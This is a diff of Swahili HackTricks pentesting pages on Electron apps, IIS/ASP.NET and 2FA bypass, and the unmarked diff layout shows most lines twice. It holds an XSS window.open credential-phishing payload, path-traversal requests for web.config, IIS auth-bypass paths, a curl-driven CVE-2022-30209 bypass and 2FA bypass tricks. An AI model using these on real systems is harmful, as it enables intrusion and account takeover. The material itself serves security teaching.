2. **Kubadilisha njia iliyojengwa** ambayo hutumiwa katika upakiaji wa msimbo au msimbo wa ndani wa Electron kwa kazi yake mwenyewe
3. **Kuzindua** matumizi ya **njia iliyobadilishwa**
1. Tekeleza **JavaScript ya kupindukia kwenye mchirizi** (XSS au urambazaji kwenye tovuti za nje)
2. **Kubadilisha njia iliyojengwa** ambayo hutumiwa katika upakiaji wa msimbo au msimbo wa ndani wa Electron kuwa kazi yake mwenyewe
3. **Kuzindua** matumizi ya **kazi iliyobadilishwa**
4. RCE?
Kuna sehemu 2 ambapo njia zilizojengwa zinaweza kubadilishwa: Katika msimbo wa upakiaji au katika msimbo wa ndani wa Electron:
@ -193,14 +207,14 @@ window.addEventListener('click', (e) => {
Kwa habari zaidi kuhusu mifano hii angalia [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) na [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)
Wakati wa kutekeleza programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya `nodeIntegration` na `contextIsolation` ni muhimu. Imethibitishwa kwamba **utekelezaji wa kanuni za mbali (RCE)** upande wa mteja unalenga skripti za kuanzisha au kanuni ya asili ya Electron kutoka kwa mchakato mkuu inazuia kwa ufanisi na mipangilio hii ikiwa mahali.
Wakati wa kutekeleza programu ya desktop ya Electron, kuhakikisha mipangilio sahihi kwa `nodeIntegration` na `contextIsolation` ni muhimu. Imethibitishwa kwamba **utekelezaji wa kanuni za mbali (RCE)** upande wa mteja unalenga skripti za kuanzisha au kanuni ya asili ya Electron kutoka kwa mchakato kuu inazuia kwa ufanisi na mipangilio hii ikiwekwa.
Mara tu mtumiaji anaposhirikiana na viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio hutekelezwa, ambayo ni muhimu kwa usalama na utendaji wa programu:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
Watu hawa **hufunikwa na maombi ya desktop** ili kutekeleza **mantiki yake ya biashara**. Programu hii huchambua ikiwa kiungo kilichopita kinapaswa kufunguliwa ndani au kwenye kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, `openInternally`. Ikiwa kazi hii inarudi `uwongo`, inaonyesha kwamba kiungo hicho kinapaswa kufunguliwa kwa nje, kwa kutumia kazi ya `shell.openExternal`.
Hizi wasikilizaji **zinafutwa na programu ya desktop** ili kutekeleza **mantiki yake ya biashara**. Programu huchambua ikiwa kiungo kilichonavigated kinapaswa kufunguliwa ndani au kwenye kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, `openInternally`. Ikiwa kazi hii inarudi `false`, inaashiria kwamba kiungo kinapaswa kufunguliwa kwa nje, kwa kutumia kazi ya `shell.openExternal`.
**Hapa kuna pseudocode iliyosimpliwa:**
@ -244,18 +258,18 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
Ikiwa **chromium** inayotumiwa na programu ni **zamani** na kuna **mapungufu yaliyojulikana** kwenye hiyo, inaweza kuwa inawezekana **kuitumia na kupata RCE kupitia XSS**.\
Unaweza kuona mfano katika **makala hii**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **XSS ya Uvutaji kwa Kupitia Bypass ya Regex ya URL ya Ndani**
## **XSS ya Uvutaji wa Kitambulisho kupitia Uvukaji wa Regex wa URL ya Ndani**
Kukisia umepata XSS lakini **hauwezi kuzindua RCE au kuiba faili za ndani** unaweza jaribu kutumia hiyo **kuiba siri kupitia uvutaji**.
Kukisia umepata XSS lakini huwezi **kuchochea RCE au kuiba faili za ndani** unaweza kujaribu kutumia hiyo **kuiba vibali kupitia uvutaji**.
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, kwa kuangalia msimbo wa JS katika sehemu ya mbele:
Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukichunguza msimbo wa JS katika sehemu ya mbele:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
Mwito wa **`openInternally`** utaamua ikiwa **kiungo** kitafunguliwa kwenye **dirisha la desktop** kama ni kiungo kinachomilikiwa na jukwaa, **au** kitafunguliwa kwenye **kivinjari kama rasilimali ya tatu**.
Mwito wa **`openInternally`** utaamua ikiwa **kiungo** kitafunguliwa kwenye **dirisha la desktop** kama ni kiungo kinachomilikiwa na jukwaa, **au** ikiwa kitafunguliwa kwenye **kivinjari kama rasilimali ya tatu**.
Katika kesi **regex** inayotumiwa na kazi hiyo inaweza kuwa **dhaifu kwa kuzidiwa** (kwa mfano kwa **kutotoroka** vipande vya subdomains) mkaidi anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mkaidi **kutaka vibali** kutoka kwa mtumiaji:
Katika kesi **regex** inayotumiwa na kazi hiyo inaweza kuwa **dhaifu kwa kuzidiwa** (kwa mfano kwa **kutotoroka** vipande vya subdomains) mkaidi anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mkaidi **na kuomba vibali** kwa mtumiaji:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -265,7 +279,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
* [**Electronegativity**](https://github.com/doyensec/electronegativity) ni chombo cha kutambua mipangilio isiyofaa na mifano ya usalama katika programu za Electron.
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) ni programu-jalizi ya VS Code ya chanzo wazi kwa programu za Electron inayotumia Electronegativity.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa ajili ya kuangalia maktaba za tatu zinazoweza kuwa na mapungufu ya usalama.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) kwa ajili ya kuangalia maktaba za tatu zinazoweza kuwa na mapungufu.
* [**Electro.ng**](https://electro.ng/): Unahitaji kununua
## Maabara
@ -305,6 +319,18 @@ npm start
* Utafiti zaidi na maandishi kuhusu usalama wa Electron katika [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **stealer malwares**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -312,9 +338,9 @@ npm start
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -14,7 +14,21 @@ Njia nyingine za kusaidia HackTricks:
</details>
Jaribu viendelezi vya faili za kutekelezeka:
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
Jaribu viendelezi vya faili za utekelezaji:
* asp
* aspx
@ -45,7 +59,7 @@ Unaweza kupakia faili za .config na kuzitumia kutekeleza nambari. Moja ya njia y
Taarifa zaidi na mbinu za kutumia udhaifu huu zinapatikana [hapa](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## IIS Discovery Bruteforce
## Uchunguzi wa IIS kwa Njia ya Kufanya Majaribio ya Nguvu
Pakua orodha niliyoandaa:
@ -69,8 +83,8 @@ Tumia bila kuongeza kificho chochote, faili zinazohitaji zina tayari.
Angalia maelezo kamili hapa: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% hint style="info" %}
Kama muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zenye marejeo kwa faili za "**assemblyIdentity**" na "**namespaces**". Kwa habari hii ni rahisi kujua **wapi ziko faili za kutekelezwa** na kuzipakua.\
Kutoka kwa **Dlls zilizopakuliwa** pia ni rahisi kupata **namespaces mpya** ambapo unapaswa kujaribu kupata na kupata faili ya web.config ili kupata namespaces mpya na assemblyIdentity.\
Kama muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zenye marejeo kwa faili za "**assemblyIdentity**" na "**namespaces**". Kwa habari hii ni rahisi kujua **wapi kuna faili za kutekelezwa** na kuzipakua.\
Kutoka kwa **Dlls zilizopakuliwa** pia ni rahisi kupata **namespaces mpya** ambapo unapaswa kujaribu kupata na kupata faili ya web.config ili kupata namespaces na assemblyIdentity mpya.\
Pia, faili za **connectionstrings.config** na **global.asax** zinaweza kuwa na habari muhimu.\\
{% endhint %}
@ -78,28 +92,28 @@ Katika maombi ya **.Net MVC**, faili ya **web.config** inacheza jukumu muhimu kw
### **Kuchunguza Faili za Binary**
Mfano wa kupata faili ya **web.config** unapatikana hapa chini:
Mfano wa kupata faili ya **web.config** unaonyeshwa hapa chini:
```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
Hii ombi inaonyesha mipangilio mbalimbali na mahitaji, kama vile:
Hii ombi inaonyesha mipangilio na mategemeo mbalimbali, kama vile:
* **EntityFramework** toleo
* **AppSettings** kwa kurasa za wavuti, uthibitishaji wa mteja, na JavaScript
* Mipangilio ya **System.web** kwa uthibitisho na wakati wa runtime
* Mipangilio ya **System.web** kwa uthibitishaji na wakati wa uendeshaji
* Mipangilio ya moduli za **System.webServer**
* Uunganisho wa vifurushi vya uendeshaji kwa maktaba nyingi kama **Microsoft.Owin**, **Newtonsoft.Json**, na **System.Web.Mvc**
* Vifungo vya uundaji wa **Runtime** kwa maktaba nyingi kama **Microsoft.Owin**, **Newtonsoft.Json**, na **System.Web.Mvc**
Mipangilio hii inaonyesha kwamba faili fulani, kama vile **/bin/WebGrease.dll**, ziko ndani ya folda ya maombi ya /bin.
Mipangilio hii inaonyesha kwamba faili fulani, kama vile **/bin/WebGrease.dll**, ziko ndani ya folda ya maombi /bin.
### **Faili za Dhibiti ya Mzizi**
Faili zilizopatikana katika saraka ya mzizi, kama vile **/global.asax** na **/connectionstrings.config** (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa maombi.
Faili zilizopatikana katika folda ya mzizi, kama vile **/global.asax** na **/connectionstrings.config** (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa maombi.
### **Namespaces na Web.Config**
Maombi ya MVC pia hufafanua faili za **web.config** za ziada kwa majina maalum ya nafasi za majina ili kuepuka matangazo ya kurudia katika kila faili, kama ilivyoonyeshwa na ombi la kupakua **web.config** nyingine.
Maombi ya MVC pia hufafanua faili za ziada za **web.config** kwa majina ya kipekee ili kuepuka matangazo ya kurudia katika kila faili, kama ilivyoonyeshwa na ombi la kupakua **web.config** nyingine.
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
@ -113,7 +127,7 @@ Host: example-mvc-application.minded
```
Hii inaashiria uwepo wa DLLs muhimu zingine, kama vile **System.Web.Mvc.dll** na **System.Web.Optimization.dll**, katika saraka ya /bin.
Katika hali ambapo DLL inaingiza nafasi ya jina inayoitwa **WebApplication1.Areas.Minded**, mshambuliaji anaweza kudokeza uwepo wa faili zingine za web.config katika njia zinazoweza kutabirika, kama vile **/jina-la-eneo/Views/**, zenye mazingira maalum na marejeo kwa DLLs zingine katika saraka ya /bin. Kwa mfano, ombi kwa **/Minded/Views/web.config** inaweza kufichua mazingira na nafasi za majina zinazoonyesha uwepo wa DLL nyingine, **WebApplication1.AdditionalFeatures.dll**.
Katika hali ambapo DLL inaingiza nafasi ya jina inayoitwa **WebApplication1.Areas.Minded**, mshambuliaji anaweza kufikiria uwepo wa faili za web.config zingine katika njia zinazoweza kutabirika, kama vile **/jina-la-eneo/Views/**, zenye mazingira maalum na marejeo kwa DLLs zingine katika saraka ya /bin. Kwa mfano, ombi kwa **/Minded/Views/web.config** inaweza kufichua mazingira na nafasi za majina zinazoonyesha uwepo wa DLL nyingine, **WebApplication1.AdditionalFeatures.dll**.
### Faili za Kawaida
@ -201,14 +215,14 @@ Ikiwa unaona kosa kama hili:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
Inamaanisha kwamba **server haukupokea jina sahihi la kikoa** ndani ya kichwa cha Mwenyeji.\
Ili kupata ukurasa wa wavuti unaweza kutazama **Cheti cha SSL** kilichotolewa na labda unaweza kupata jina la kikoa/subdomain hapo. Ikiwa hakipo hapo unaweza kuhitaji **kufanya VHosts kwa nguvu** hadi upate sahihi.
Ili kupata ukurasa wa wavuti, unaweza kutazama **Cheti cha SSL** kilichotolewa na labda unaweza kupata jina la kikoa/kidogo hapo. Ikiwa hakipo hapo, unaweza kuhitaji **kufanya VHosts kwa nguvu** hadi upate sahihi.
## Mapungufu ya zamani ya IIS yanayostahili kutafutwa
### Microsoft IIS tilde character "\~" Mporomoko/Wasilisho wa Jina Fupi la Faili/Direktori
### Microsoft IIS tilde character "\~" Mporomoko/Wasilisho wa Jina Fupi la Faili/Folderi
Unaweza kujaribu **kuorodhesha folda na faili** ndani ya kila folda iliyopatikana (hata kama inahitaji Uthibitishaji wa Msingi) kwa kutumia **njia hii**.\
Kizuizi kikuu cha njia hii ikiwa server ina mapungufu ni kwamba **inaweza kupata hadi herufi 6 za kwanza za jina la kila faili/folder na herufi 3 za kwanza za upanuzi** wa faili.
Kizuizi kikuu cha njia hii ikiwa server ina mapungufu ni kwamba **inaweza kupata hadi herufi 6 za kwanza za jina la kila faili/folderi na herufi 3 za kwanza za upanuzi** wa faili.
Unaweza kutumia [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) kujaribu mapungufu huu:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
@ -222,15 +236,15 @@ Unaweza pia kutumia **metasploit**: `tumia scanner/http/iis_shortname_scanner`
**Puuza** uthibitishaji wa msingi (**IIS 7.5**) kwa kujaribu kupata: `/admin:$i30:$INDEX_ALLOCATION/admin.php` au `/admin::$INDEX_ALLOCATION/admin.php`
Unaweza kujaribu **kuchanganya** mapungufu huu na wa mwisho kupata **folda mpya** na **kupuuza** uthibitishaji.
Unaweza kujaribu **kuchanganya** mapungufu huu na ule wa mwisho kupata **folda mpya** na **kupuuza** uthibitishaji.
## Ufuatiliaji wa ASP.NET Trace.AXD uliozimishwa
## Ufuatiliaji wa ASP.NET Trace.AXD uliowezeshwa kwa kufuatilia makosa
ASP.NET inajumuisha hali ya ufuatiliaji na faili yake inaitwa `trace.axd`.
ASP.NET inajumuisha hali ya kufuatilia makosa na faili yake inaitwa `trace.axd`.
Inaendelea kumbukumbu ya kina ya maombi yote yaliyofanywa kwa programu kwa kipindi fulani cha wakati.
Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya ombi na majibu, njia za kimwili, habari za msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.
Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya ombi na majibu, njia za kimwili, maelezo ya msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
@ -240,17 +254,17 @@ Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuz
ASPXAUTH hutumia habari ifuatayo:
* **`validationKey`** (string): ufunguo ulio na hex kwa ajili ya uthibitisho wa saini.
* **`validationKey`** (string): ufunguo ulio na hex ili kutumika kwa uthibitisho wa saini.
* **`decryptionMethod`** (string): (chaguo-msingi "AES").
* **`decryptionIV`** (string): vector ya kuanzisha iliyohex (chaguo-msingi ni vector ya sifuri).
* **`decryptionKey`** (string): ufunguo ulio na hex kwa ajili ya kufungua.
* **`decryptionKey`** (string): ufunguo ulio na hex ili kutumika kwa kufungua.
Hata hivyo, baadhi ya watu watatumia **thamani za chaguo-msingi** za vigezo hivi na watatumia **kuki ya barua pepe ya mtumiaji**. Kwa hivyo, ikiwa unaweza kupata wavuti inayotumia **jukwaa lilelile** linalotumia kuki ya ASPXAUTH na **kuunda mtumiaji na barua pepe ya mtumiaji unayetaka kujifanya** kwenye server inayoshambuliwa, unaweza kutumia **kuki kutoka kwenye server ya pili kwenye ya kwanza** na kujifanya kuwa mtumiaji.\
Hata hivyo, watu fulani watatumia **thamani za chaguo-msingi** za vigezo hivi na watatumia **kuki ya barua pepe ya mtumiaji**. Kwa hivyo, ikiwa unaweza kupata wavuti inayotumia **jukwaa sawa** linalotumia kuki ya ASPXAUTH na **kuunda mtumiaji na barua pepe ya mtumiaji unayetaka kujifanya** kwenye server inayoshambuliwa, unaweza kutumia **kuki kutoka kwa server ya pili kwenye ya kwanza** na kujifanya kuwa mtumiaji.\
Shambulio hili lilifanikiwa katika hii [**makala**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
## Kupuuza Uthibitishaji wa IIS kwa kutumia nywila zilizohifadhiwa (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Ripoti kamili hapa](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Hitilafu katika msimbo **haikuchunguza ipasavyo nywila iliyotolewa na mtumiaji**, hivyo mshambuliaji ambaye **hashi ya nywila inagongana na funguo** ambayo tayari iko kwenye **cache** ataweza kuingia kama mtumiaji huyo.
[Ripoti kamili hapa](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kosa katika nambari **haikuchunguza ipasavyo nywila iliyotolewa na mtumiaji**, kwa hivyo mshambuliaji ambaye **hashi ya nywila inagonga funguo** ambalo tayari lipo kwenye **cache** ataweza kuingia kama mtumiaji huyo.
```python
# script for sanity check
> type test.py
@ -270,16 +284,28 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,8 +1,8 @@
# Kupuuza Uthibitishaji wa Hatua Mbili (2FA/OTP)
# Kupita kwa 2FA/OTP
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,137 +10,137 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## **Mbinu za Kupuuza Uthibitishaji wa Hatua Mbili (2FA)**
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## **Mbinu za Kupita kwa Uthibitishaji wa Hatua Mbili Ulioboreshwa**
### **Upatikanaji wa Moja kwa Moja wa Njia ya Mwisho**
Kupuuza 2FA, fikia moja kwa moja njia ya mwisho, kujua njia ni muhimu. Ikiwa haujafanikiwa, badilisha **kichwa cha Referrer** kufanana na urambazaji kutoka ukurasa wa uthibitishaji wa 2FA.
Kupita kwa 2FA, upate upatikanaji wa njia inayofuata moja kwa moja, kujua njia ni muhimu. Ikiwa haujafanikiwa, badilisha **kichwa cha Referrer** kufanana na urambazaji kutoka kwenye ukurasa wa uthibitishaji wa 2FA.
### **Matumizi ya Tena ya Alama**
### **Matumizi ya Tena ya Token**
Kutumia tena alama zilizotumiwa hapo awali kwa uthibitishaji ndani ya akaunti inaweza kuwa na ufanisi.
Kutumia tena token zilizotumiwa hapo awali kwa uthibitishaji ndani ya akaunti inaweza kuwa na ufanisi.
### **Matumizi ya Alama Zisizotumiwa**
### **Matumizi ya Token Zisizotumiwa**
Kuchimba alama kutoka kwenye akaunti yako mwenyewe ili kupuuza 2FA kwenye akaunti nyingine kunaweza kujaribiwa.
Kuchimba token kutoka kwenye akaunti yako mwenyewe ili kupita 2FA kwenye akaunti nyingine kunaweza kujaribiwa.
### **Ufunuo wa Alama**
### **Ufunuo wa Token**
Chunguza ikiwa alama inafunuliwa katika majibu kutoka kwenye programu ya wavuti.
Chunguza ikiwa token inafunuliwa katika jibu kutoka kwenye programu ya wavuti.
### **Udanganyifu wa Kiungo cha Uthibitishaji**
Kutumia **kiungo cha uthibitishaji wa barua pepe uliotumwa wakati wa uundaji wa akaunti** kunaweza kuruhusu ufikiaji wa wasifu bila 2FA, kama ilivyoelezwa kwa undani katika [chapisho](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b).
Kutumia **kiungo cha uthibitishaji wa barua pepe uliotumwa wakati wa uundaji wa akaunti** kunaweza kuruhusu upatikanaji wa wasifu bila 2FA, kama ilivyoelezwa kwenye [machapisho](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b).
### **Udhibiti wa Kikao**
Kuanzisha vikao kwa akaunti ya mtumiaji na ya muhanga, na kukamilisha 2FA kwa akaunti ya mtumiaji bila kuendelea, inaruhusu jaribio la kupata hatua inayofuata katika mchakato wa akaunti ya muhanga, ikichexploitisha mipaka ya usimamizi wa kikao cha nyuma.
Kuanzisha vikao kwa akaunti ya mtumiaji na akaunti ya mwathiriwa, na kukamilisha 2FA kwa akaunti ya mtumiaji bila kuendelea, inaruhusu jaribio la kupata hatua inayofuata katika mchakato wa akaunti ya mwathiriwa, ikidanganya mipaka ya usimamizi wa kikao cha nyuma.
### **Mfumo wa Kurejesha Nywila**
### **Mbinu ya Kurejesha Nywila**
Kuchunguza kazi ya kurejesha nywila, ambayo inaingiza mtumiaji kwenye programu baada ya kurejesha, kwa uwezo wake wa kuruhusu urejeshaji wa nywila nyingi kwa kutumia kiungo kimoja ni muhimu. Kuingia kwa kutumia maelezo ya kuingia upya kunaweza kupuuza 2FA.
Kuchunguza kazi ya kurejesha nywila, ambayo inaingiza mtumiaji kwenye programu baada ya kurejesha, kwa uwezo wake wa kuruhusu urejeshaji wa mara nyingi kwa kutumia kiungo kimoja ni muhimu. Kuingia kwa kutumia maelezo ya kuingia upya kunaweza kupita 2FA.
### **Uvamizi wa Jukwaa la OAuth**
### **Udanganyifu wa Jukwaa la OAuth**
Kuvamia akaunti ya mtumiaji kwenye jukwaa la **OAuth** lililothibitishwa (k.m., Google, Facebook) inaweza kutoa njia ya kupuuza 2FA.
Kudukua akaunti ya mtumiaji kwenye jukwaa la **OAuth** lililoidhinishwa (k.m., Google, Facebook) inaweza kutoa njia ya kupita 2FA.
### **Mashambulizi ya Brute Force**
### **Mashambulio ya Brute Force**
#### **Kutokuwepo kwa Kikomo cha Kasi**
Ukosefu wa kikomo kwenye idadi ya majaribio ya nambari inaweza kuruhusu mashambulizi ya brute force, ingawa inapaswa kuzingatiwa kikomo cha kimya cha kasi.
